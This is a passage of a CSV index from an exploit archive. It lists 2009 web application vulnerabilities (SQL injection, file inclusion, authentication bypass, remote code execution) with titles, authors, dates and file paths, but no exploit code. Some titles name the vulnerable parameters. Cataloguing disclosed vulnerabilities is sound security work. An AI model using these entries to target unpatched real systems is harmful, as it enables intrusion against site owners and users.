'key' SQL Injection",2009-06-22,Mr.tro0oqy,webapps,php, +9001,exploits/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution",2009-06-22,The:Paradox,webapps,php, +9004,exploits/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution",2009-06-23,BlackH,webapps,php, +9005,exploits/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution",2009-06-23,BlackH,webapps,php, +9008,exploits/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-06-23,CraCkEr,webapps,php, +9009,exploits/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",webapps,php, +9010,exploits/php/webapps/9010.txt,"Glossword 1.8.11 - 'index.php?x' Local File Inclusion",2009-06-24,t0fx,webapps,php, +9011,exploits/php/webapps/9011.txt,"Joomla! Component com_pinboard - Arbitrary File Upload",2009-06-24,ViRuSMaN,webapps,php, +9012,exploits/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion",2009-06-24,CraCkEr,webapps,php, +9014,exploits/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - 'forum' Cross-Site Scripting Cookie Stealing / Blind SQL Injection",2009-06-24,JosS,webapps,php, +9015,exploits/php/webapps/9015.txt,"LightOpenCMS 0.1 - 'smarty.php?cwd' Local File Inclusion",2009-06-24,JosS,webapps,php, +9016,exploits/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",webapps,php, +9017,exploits/php/webapps/9017.txt,"Joomla! Component com_pinboard - 'task' SQL Injection",2009-06-25,Stack,webapps,php, +9018,exploits/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,webapps,php, +9019,exploits/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,webapps,php, +9020,exploits/php/webapps/9020.py,"AlumniServer 1.0.1 - 'resetpwemail' Blind SQL Injection",2009-06-25,YEnH4ckEr,webapps,php, +9021,exploits/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module 'pollID' Blind SQL Injection",2009-06-25,XaDoS,webapps,php, +9022,exploits/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,webapps,php, +9023,exploits/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,webapps,php, +9024,exploits/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",webapps,php, +9025,exploits/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,webapps,php, +9026,exploits/php/webapps/9026.txt,"WHOISCART - Authentication Bypass / Information Disclosure",2009-06-29,SecurityRules,webapps,php, +9027,exploits/php/webapps/9027.txt,"Messages Library 2.0 - 'cat.php?CatID' SQL Injection",2009-06-29,SecurityRules,webapps,php, +9028,exploits/php/webapps/9028.txt,"Joomla! Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",webapps,php, +9030,exploits/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - 'category' SQL Injection",2009-06-29,"Chip d3 bi0s",webapps,php, +9032,exploits/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",webapps,php, +9035,exploits/php/webapps/9035.txt,"Almnzm - 'COOKIE: customer' SQL Injection",2009-06-29,Qabandi,webapps,php, +9036,exploits/php/webapps/9036.txt,"PHP-Sugar 0.80 - 'index.php?t' Local File Inclusion",2009-06-29,ahmadbady,webapps,php, +9037,exploits/php/webapps/9037.txt,"Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",webapps,php, +9040,exploits/php/webapps/9040.txt,"Joomla! Component com_bookflip - 'book_id' SQL Injection",2009-06-29,boom3rang,webapps,php, +9041,exploits/php/webapps/9041.txt,"Audio Article Directory - 'file' Remote File Disclosure",2009-06-29,"ThE g0bL!N",webapps,php, +9042,exploits/php/webapps/9042.pl,"NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injections",2009-06-29,jmp-esp,webapps,php, +9043,exploits/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,webapps,php, +9044,exploits/php/webapps/9044.txt,"dm FileManager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,webapps,php, +9048,exploits/php/webapps/9048.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,webapps,php, +9049,exploits/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,webapps,php, +9050,exploits/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,webapps,php, +9051,exploits/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,webapps,php, +9052,exploits/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Local File Inclusion",2009-06-30,CWD@rBe,webapps,php, +9053,exploits/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,webapps,php, +9054,exploits/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,webapps,php, +9055,exploits/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,webapps,php, +9056,exploits/php/webapps/9056.txt,"MDPro Module CWGuestBook 2.1 - SQL Injection",2009-06-30,Dante90,webapps,php, +9057,exploits/php/webapps/9057.txt,"tsep 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,webapps,php, +9058,exploits/php/webapps/9058.pl,"PunBB Extension Vote For Us 1.0.1 - Blind SQL Injection",2009-06-30,Dante90,webapps,php, +9059,exploits/php/webapps/9059.html,"Messages Library 2.0 - Arbitrary Administrator Account",2009-06-30,"ThE g0bL!N",webapps,php, +9062,exploits/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message",2009-07-01,Stack,webapps,php, +9063,exploits/php/webapps/9063.txt,"Messages Library 2.0 - Insecure Cookie Handling",2009-07-01,Stack,webapps,php, +9068,exploits/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,webapps,php, +9069,exploits/php/webapps/9069.txt,"CMS chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,webapps,php, +9073,exploits/php/webapps/9073.php,"YourTube 2.0 - Arbitrary Database Disclosure",2009-07-02,"Security Code Team",webapps,php, +9074,exploits/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation",2009-07-02,"Gregory Duchemin",webapps,cgi, +9075,exploits/php/webapps/9075.txt,"AdminLog 0.5 - 'valid_login' Authentication Bypass",2009-07-02,SirGod,webapps,php, +9076,exploits/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,webapps,php, +9077,exploits/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,webapps,php, +9079,exploits/php/webapps/9079.txt,"Opial 1.0 - Authentication Bypass",2009-07-02,Moudi,webapps,php, +9080,exploits/php/webapps/9080.txt,"Opial 1.0 - 'albumID' SQL Injection",2009-07-02,"ThE g0bL!N",webapps,php, +9081,exploits/php/webapps/9081.txt,"Rentventory - Multiple SQL Injections",2009-07-02,Moudi,webapps,php, +9086,exploits/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",webapps,php, +9087,exploits/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,webapps,php, +9088,exploits/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,webapps,php, +9089,exploits/php/webapps/9089.txt,"ClearContent - '/image.php?url' Local/Remote File Inclusion",2009-07-09,MizoZ,webapps,php, +9091,exploits/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,webapps,php, +9092,exploits/php/webapps/9092.txt,"webasyst shop-script - Blind SQL Injection / Cross-Site Scripting",2009-07-09,Vrs-hCk,webapps,php, +9094,exploits/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,webapps,php, +9095,exploits/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,webapps,php, +9098,exploits/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,webapps,php, +9099,exploits/php/webapps/9099.pl,"Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection",2009-07-09,Mr.tro0oqy,webapps,php, +9101,exploits/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,webapps,php, +9103,exploits/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,webapps,php, +9105,exploits/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,webapps,php, +9107,exploits/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php?user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",webapps,php, +9109,exploits/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,webapps,php, +9110,exploits/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",webapps,php, +9111,exploits/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,webapps,php, +9112,exploits/php/webapps/9112.txt,"Joomla! Component com_propertylab - 'auction_id' SQL Injection",2009-07-10,"Chip d3 bi0s",webapps,php, +9115,exploits/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,webapps,php, +9118,exploits/php/webapps/9118.txt,"ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection",2009-07-10,Moudi,webapps,php, +9119,exploits/php/webapps/9119.txt,"LionWiki - 'index.php' Local File Inclusion",2009-07-10,MoDaMeR,webapps,php, +9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,webapps,php, +9122,exploits/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload / Cross-Site Scripting / SQL Injection",2009-07-11,LMaster,webapps,php, +9125,exploits/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injections",2009-07-11,MizoZ,webapps,php, +9126,exploits/php/webapps/9126.txt,"Joomla! Component com_category - 'catid' SQL Injection",2009-07-11,Prince_Pwn3r,webapps,php, +9127,exploits/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,webapps,php, +9129,exploits/php/webapps/9129.txt,"censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting",2009-07-12,Vrs-hCk,webapps,php, +9130,exploits/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",webapps,php, +9132,exploits/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,webapps,php, +9138,exploits/php/webapps/9138.txt,"onepound shop 1.x - 'products.php' SQL Injection",2009-07-13,Affix,webapps,php, +9140,exploits/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,webapps,cgi, +9144,exploits/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,webapps,php, +9145,exploits/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,webapps,php, +9150,exploits/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",webapps,php, +9151,exploits/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition / Information Disclosure",2009-07-15,YEnH4ckEr,webapps,php, +9153,exploits/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,webapps,php, +9154,exploits/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,webapps,php, +9155,exploits/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",webapps,php, +9156,exploits/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion",2009-07-15,"Khashayar Fereidani",webapps,php, +9159,exploits/php/webapps/9159.php,"Infinity 2.0.5 - Arbitrary Create Admin",2009-07-15,Qabandi,webapps,php, +9161,exploits/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,webapps,php, +9162,exploits/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,webapps,php, +9164,exploits/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password",2009-07-16,TiGeR-Dz,webapps,php, +9165,exploits/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,webapps,php, +9166,exploits/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)",2009-07-16,petros,webapps,php, +9171,exploits/php/webapps/9171.txt,"VS PANEL 7.5.5 - 'results.php?Cat_ID' SQL Injection",2009-07-16,C0D3R-Dz,webapps,php, +9174,exploits/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Blind SQL Injection",2009-07-16,boom3rang,webapps,php, +9176,exploits/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,webapps,php, +9179,exploits/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,webapps,php, +9180,exploits/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - 'entry' SQL Injection",2009-07-17,JIKO,webapps,php, +9182,exploits/php/webapps/9182.txt,"AJOX Poll - 'managepoll.php' Authentication Bypass",2009-07-17,SirGod,webapps,php, +9183,exploits/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass / SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,webapps,php, +9184,exploits/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - 'SITE_fiche.php' SQL Injection",2009-07-17,DeCo017,webapps,php, +9185,exploits/php/webapps/9185.txt,"good/bad vote - Cross-Site Scripting / Local File Inclusion",2009-07-17,Moudi,webapps,php, +9187,exploits/php/webapps/9187.txt,"Joomla! Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,webapps,php, +9193,exploits/php/webapps/9193.pl,"WebVision 2.1 - 'news.php?n' SQL Injection",2009-07-17,Mr.tro0oqy,webapps,php, +9194,exploits/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,webapps,php, +9195,exploits/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,webapps,php, +9196,exploits/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,webapps,php, +9202,exploits/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - 'silentum_Guestbook.php' SQL Injection",2009-07-20,Bgh7,webapps,php, +9203,exploits/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,webapps,php, +9204,exploits/php/webapps/9204.txt,"MiniCWB 2.3.0 - 'lang' Remote File Inclusion",2009-07-20,NoGe,webapps,php, +9205,exploits/php/webapps/9205.txt,"mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell",2009-07-20,SirGod,webapps,php, +9211,exploits/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",webapps,php, +9217,exploits/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - 'lid' SQL Injection",2009-07-20,Vrs-hCk,webapps,php, +9219,exploits/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,webapps,php, +9225,exploits/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,webapps,php, +9226,exploits/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,webapps,php, +9227,exploits/php/webapps/9227.txt,"Meta Search Engine Script - 'url' Local File Disclosure",2009-07-21,Moudi,webapps,php, +9231,exploits/php/webapps/9231.txt,"Phorum 5.2.11 - Persistent Cross-Site Scripting",2009-07-22,Crashfr,webapps,php, +9235,exploits/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,webapps,php, +9236,exploits/php/webapps/9236.txt,"Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection",2009-07-23,"599eme Man",webapps,php, +9237,exploits/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,webapps,php, +9238,exploits/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - 'packageId' SQL Injection",2009-07-23,Mr.tro0oqy,webapps,php, +9239,exploits/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",webapps,php, +9243,exploits/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,webapps,php, +9244,exploits/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",webapps,php, +9246,exploits/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php?idAuthor' SQL Injection",2009-07-24,NoGe,webapps,php, +9248,exploits/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,webapps,php, +9249,exploits/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,webapps,php, +9250,exploits/php/webapps/9250.sh,"WordPress 2.8.1 - 'url' Cross-Site Scripting",2009-07-24,superfreakaz0rz,webapps,php, +9251,exploits/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,webapps,php, +9252,exploits/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,webapps,php, +9254,exploits/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' SQL Injection (2)",2009-07-24,skys,webapps,php, +9255,exploits/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,webapps,php, +9256,exploits/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,webapps,php, +9257,exploits/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - 'file' Remote File Disclosure",2009-07-24,Qabandi,webapps,php, +9258,exploits/php/webapps/9258.txt,"Joomla! Component Almond Classifieds com_aclassf 7.5 - Multiple Vulnerabilities",2009-07-27,Moudi,webapps,php, +9259,exploits/php/webapps/9259.txt,"almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +9260,exploits/php/webapps/9260.txt,"skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +9261,exploits/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +9262,exploits/php/webapps/9262.txt,"garagesalesjunkie - SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +9263,exploits/php/webapps/9263.txt,"URA 3.0 - 'cat' SQL Injection",2009-07-27,"Chip d3 bi0s",webapps,php, +9266,exploits/php/webapps/9266.txt,"iwiccle 1.01 - Local File Inclusion / SQL Injection",2009-07-27,SirGod,webapps,php, +9267,exploits/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,webapps,php, +9269,exploits/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,webapps,php, +9270,exploits/php/webapps/9270.txt,"Super Mod System 3.0 - 's' SQL Injection",2009-07-27,MizoZ,webapps,php, +9271,exploits/php/webapps/9271.txt,"Inout Adserver - 'id' SQL Injection",2009-07-27,boom3rang,webapps,php, +9273,exploits/php/webapps/9273.php,"Allomani Mobile 2.5 - Blind SQL Injection",2009-07-27,Qabandi,webapps,php, +9274,exploits/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,webapps,php, +9275,exploits/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,webapps,php, +9276,exploits/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,webapps,php, +9279,exploits/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,webapps,php, +9280,exploits/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,webapps,php, +9281,exploits/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,webapps,php, +9282,exploits/php/webapps/9282.txt,"Magician Blog 1.0 - 'ids' SQL Injection",2009-07-27,Evil-Cod3r,webapps,php, +9283,exploits/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,webapps,php, +9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php, +9287,exploits/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php?ID' SQL Injection",2009-07-28,"ThE g0bL!N",webapps,php, +9288,exploits/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' SQL Injection",2009-07-28,MizoZ,webapps,php, +9289,exploits/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,webapps,php, +9290,exploits/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,webapps,php, +9292,exploits/php/webapps/9292.txt,"PaoLink 1.0 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,webapps,php, +9293,exploits/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,webapps,php, +9294,exploits/php/webapps/9294.txt,"PaoLiber 1.1 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,webapps,php, +9296,exploits/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",webapps,php, +9297,exploits/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,webapps,php, +9307,exploits/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 - 'readfile()' Local File Disclosure",2009-07-30,GoLd_M,webapps,php, +9308,exploits/php/webapps/9308.txt,"justVisual 1.2 - 'fs_jVroot' Remote File Inclusion",2009-07-30,SirGod,webapps,php, +9309,exploits/php/webapps/9309.txt,"Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection",2009-07-30,SirGod,webapps,php, +9310,exploits/php/webapps/9310.txt,"dit.cms 1.3 - 'path/sitemap/relPath' Local File Inclusion",2009-07-30,SirGod,webapps,php, +9311,exploits/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,webapps,php, +9312,exploits/php/webapps/9312.txt,"d.net CMS - Local File Inclusion / SQL Injection",2009-07-30,SirGod,webapps,php, +9313,exploits/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Local File Inclusion",2009-07-30,SirGod,webapps,php, +9314,exploits/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,webapps,php, +9315,exploits/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,webapps,php, +9316,exploits/php/webapps/9316.txt,"linkSpheric 0.74b6 - 'listID' SQL Injection",2009-07-30,NoGe,webapps,php, +9320,exploits/php/webapps/9320.php,"Arab Portal 2.x - 'forum.php' SQL Injection",2009-08-01,rEcruit,webapps,php, +9322,exploits/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusions",2009-08-01,NoGe,webapps,php, +9324,exploits/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",webapps,php, +9325,exploits/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,webapps,php, +9326,exploits/php/webapps/9326.txt,"aa33code 0.0.1 - Local File Inclusion / Authentication Bypass / File Disclosure",2009-08-01,SirGod,webapps,php, +9327,exploits/php/webapps/9327.txt,"Mobilelib Gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,webapps,php, +9328,exploits/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,webapps,asp, +9331,exploits/php/webapps/9331.txt,"ProjectButler 1.5.0 - 'pda_projects.php?offset' Remote File Inclusion",2009-08-03,cr4wl3r,webapps,php, +9332,exploits/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,webapps,php, +9333,exploits/php/webapps/9333.txt,"Netpet CMS 1.9 - 'confirm.php?language' Local File Inclusion",2009-08-03,SirGod,webapps,php, +9334,exploits/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,webapps,php, +9335,exploits/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,webapps,php, +9336,exploits/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,webapps,php, +9337,exploits/php/webapps/9337.txt,"simplePHPWeb 0.2 - 'files.php' Authentication Bypass",2009-08-03,SirGod,webapps,php, +9338,exploits/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,webapps,php, +9339,exploits/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,webapps,php, +9340,exploits/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,webapps,php, +9341,exploits/php/webapps/9341.txt,"Questions Answered 1.3 - Authentication Bypass",2009-08-03,snakespc,webapps,php, +9342,exploits/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",webapps,php, +9344,exploits/php/webapps/9344.txt,"Multi Website 1.5 - index PHP action SQL Injection",2009-08-03,SarBoT511,webapps,php, +9347,exploits/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,webapps,php, +9348,exploits/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",webapps,php, +9349,exploits/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - 'index.php?more' SQL Injection",2009-08-03,"Salvatore Fresta",webapps,php, +9350,exploits/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,webapps,php, +9351,exploits/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,webapps,php, +9353,exploits/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,webapps,php, +9355,exploits/php/webapps/9355.txt,"elgg 1.5 - '/_css/js.php' Local File Inclusion",2009-08-04,eLwaux,webapps,php, +9356,exploits/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,webapps,php, +9357,exploits/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,webapps,cgi, +9358,exploits/php/webapps/9358.txt,"In-portal 4.3.1 - 'index.php?env' Local File Inclusion",2009-08-04,"Angela Chang",webapps,php, +9365,exploits/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,webapps,php, +9367,exploits/php/webapps/9367.txt,"tenrok 1.1.0 - File Disclosure / Remote Code Execution",2009-08-05,SirGod,webapps,php, 